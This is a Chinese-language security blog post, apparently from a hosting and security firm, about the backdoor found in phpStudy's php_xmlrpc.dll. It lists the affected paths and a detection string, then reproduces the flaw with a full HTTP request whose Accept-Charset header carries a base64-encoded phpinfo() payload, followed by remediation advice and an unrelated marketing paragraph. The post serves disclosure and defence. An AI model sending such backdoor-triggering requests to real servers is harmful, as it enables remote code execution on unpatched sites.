phpStudy于近日被暴露出有后門漏洞，之前的phpStudy2016，phpStudy2018部分版本，EXE程序包疑似被入侵者植入木馬后門，導(dǎo)致許多網(wǎng)站及服務(wù)器被攻擊，被篡改，目前我們SINE安全公司立即成立phpStudy安全應(yīng)急響應(yīng)小組，針對(duì)部分客戶服務(wù)器上安裝該P(yáng)HP一鍵環(huán)境搭建的情況，進(jìn)行了全面的漏洞修復(fù)與安全防護(hù)。第一時(shí)間保障客戶的網(wǎng)站安全，以及服務(wù)器的安全穩(wěn)定運(yùn)行。關(guān)于該漏洞的詳情，我們來(lái)安全分析一下，以及復(fù)現(xiàn)，漏洞修復(fù)，三個(gè)方面來(lái)入手。

讓客戶滿意是我們工作的目標(biāo)，不斷超越客戶的期望值來(lái)自于我們對(duì)這個(gè)行業(yè)的熱愛(ài)。我們立志把好的技術(shù)通過(guò)有效、簡(jiǎn)單的方式提供給客戶，將通過(guò)不懈努力成為客戶在信息化領(lǐng)域值得信任、有價(jià)值的長(zhǎng)期合作伙伴，公司提供的服務(wù)項(xiàng)目有：國(guó)際域名空間、網(wǎng)站空間、營(yíng)銷軟件、網(wǎng)站建設(shè)、烏審網(wǎng)站維護(hù)、網(wǎng)站推廣。

國(guó)內(nèi)大部分的服務(wù)器尤其windows系統(tǒng)，都有安裝phpstudy一鍵環(huán)境搭建軟件，該軟件可以自動(dòng)設(shè)置安裝apache,php，mysql數(shù)據(jù)庫(kù)，以及zend安裝，并自動(dòng)設(shè)置root賬號(hào)密碼，一鍵化操作，深受廣大網(wǎng)站運(yùn)營(yíng)以及服務(wù)器維護(hù)者的喜歡，正因?yàn)槭褂玫娜溯^多，導(dǎo)致被攻擊者盯上并植入木馬后門到exe程序包中。

該后門文件是PHP環(huán)境當(dāng)中的php_xmlrpc.dll模塊被植入木馬后門，具體的名稱，經(jīng)過(guò)我們SINE安全技術(shù)的安全檢測(cè)，可以確定是phpstudy2016.11.03版本，以及phpstudy2018.02.11版本，后門文件如下：

phpphp-5.2.17extphp_xmlrpc.dll

phpphp-5.4.45extphp_xmlrpc.dll

PHPTutorialphpphp-5.2.17extphp_xmlrpc.dll

PHPTutorialphpphp-5.4.45extphp_xmlrpc.dll

在phpstudy文件夾下面搜索php_xmlrpc.dll文件，看下這個(gè)dll文件里是否包含@eval(%s('%s'))內(nèi)容的字符，如果有的話，基本上就是有木馬后門了。截圖如下：

我們來(lái)分析復(fù)現(xiàn)漏洞看下，是否可以成功的利用，首先本地安裝phpstudy2016.11.03版本的安裝壓縮包，解壓到當(dāng)前目錄直接點(diǎn)擊EXE運(yùn)行即可，默認(rèn)安裝的PHP版本就是php5.4.45版本，然后本地打開(kāi)看下，用抓包工具檢測(cè)當(dāng)前的數(shù)據(jù)包。

GET /safe.php HTTP/1.1

Host:

Cache-Control: max-age=1

Upgrade-Insecure-Requests: 2

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36

(KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36

Accept:

Accept-Language: zh-CN,zh;q=0.6

Accept-Encoding:gzip

Accept-Charset:=cGhwaW5mbyUyOCUyOSUzQg==(這個(gè)是POC代碼加密的)

Cookie: Hm_lpvt_49143271fe785debb3b77f77f7c71752=1569485559;

Connection: close

漏洞的執(zhí)行位置是在數(shù)據(jù)包的Accept-Charset里，這里寫入惡意代碼加密的phpinfo，然后提交過(guò)去，就會(huì)執(zhí)行phpinfo語(yǔ)句。

關(guān)于phpstudy漏洞的修復(fù)辦法，從phpstudy官方網(wǎng)站下載最新的版本，將php_xmlrpc.dll進(jìn)行替換到舊版本里即可，對(duì)PHP的Accept-Charset的參數(shù)傳輸做安全過(guò)濾與效驗(yàn)防止提交惡意參數(shù)，禁止代碼的傳輸，即可修復(fù)此漏洞， （經(jīng)證實(shí)對(duì)此phpstudy官方公告此后門是黑客之前入侵了官網(wǎng)篡改了程序包導(dǎo)致的安全問(wèn)題，強(qiáng)烈鄙視黑客的行為?。┤绻鷮?duì)代碼不是太了解的話，也可以找專業(yè)的網(wǎng)站安全公司來(lái)處理解決，國(guó)內(nèi)SINESAFE，啟明星辰，綠盟都是比較不錯(cuò)的，目前該漏洞影響范圍較廣，請(qǐng)各位網(wǎng)站運(yùn)營(yíng)者盡快修復(fù)漏洞，打好補(bǔ)丁，防止網(wǎng)站被攻擊，被篡改。

分享標(biāo)題：phpStudypoc漏洞復(fù)現(xiàn)以及漏洞修復(fù)辦法-創(chuàng)新互聯(lián)
文章路徑：http://weahome.cn/article/ddihji.html